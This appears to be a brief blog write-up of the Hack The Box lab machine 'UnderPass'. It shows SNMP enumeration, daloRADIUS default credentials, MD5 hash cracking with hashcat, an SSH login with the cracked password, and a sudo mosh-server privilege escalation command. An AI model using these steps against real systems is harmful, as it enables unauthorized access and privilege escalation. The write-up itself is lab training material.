Yuvraj Singh | Cybersecurity & AI Enthusiast

HTB - UnderPass

4 min read

Recon:

└─$ nmap -sC -sV -sU 10.10.11.48 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 09:33 IST Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 12.30% done; ETC: 09:45 (0:10:20 remaining) Nmap scan report for 10.10.11.48 Host is up (0.17s latency). Not shown: 983 closed udp ports (port-unreach) PORT STATE SERVICE VERSION 80/udp open|filtered http 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: c7ad5c4856d1cf6600000000 | snmpEngineBoots: 31 |_ snmpEngineTime: 22m05s | snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 |_ System uptime: 22m5.39s (132539 timeticks) 1812/udp open|filtered radius 1813/udp open|filtered radacct 3702/udp open|filtered ws-discovery 5000/udp open|filtered upnp 16498/udp open|filtered unknown 17836/udp open|filtered unknown 19022/udp open|filtered unknown 20762/udp open|filtered unknown 21476/udp open|filtered unknown 23176/udp open|filtered unknown 25709/udp open|filtered unknown 33744/udp open|filtered unknown 44946/udp open|filtered unknown 51972/udp open|filtered unknown 54711/udp open|filtered unknown Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!
  • Port 22 and 80
  • port 80 has apache 2.4.52
  • `port 161

Enumeration:

  • google about the version of apache running
  • this version has many vulnearbilites but none worked.
snmpwalk -v1 -c public 10.129.189.64
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64" iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = Timeticks: (943070) 2:37:10.70 iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb" iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!" iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas" iso.3.6.1.2.1.1.7.0 = INTEGER: 72 iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1 iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1 iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1 iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1 iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1 iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49 iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50 iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4 iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3 iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92 iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB." iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching." iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model." iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities" iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP." iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations" iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations" iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations" iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering." iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications." iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (0) 0:00:00.00 iso.3.6.1.2.1.25.1.1.0 = Timeticks: (945647) 2:37:36.47 iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 0C 16 05 09 01 00 2B 00 00 iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216 iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 " iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0 iso.3.6.1.2.1.25.1.6.0 = Gauge32: 228 iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0 iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
  • Linux Underpass 5.15.0
  • UnderPass.htb is only daloradius server
  • The presence of a **daloRADIUS server** on **UnderPass.htb** could provide significant opportunities for enumeration and exploitation. **daloRADIUS** is a web-based front-end for managing FreeRADIUS, a RADIUS server implementation.
  • github page of daloradius, we have login.php on /app/user/login.php AND
  • one we have on /app/operators/login.php

  • default creds found in INSTALL

  • administrator:radius

  • database creds found steve:testing123
  • `since we have admin access we can now read files from
  • /mng-list-all.php to list all users `

hashcat -m 0 -a 0 hash.txt ~/rockyou.txt
  • svcMosh:underwaterfriends

User Login:

ssh svcMosh@underpass.htb

Privelege Escalation:

mosh --server="sudo /usr/bin/mosh-server" localhost

Graph View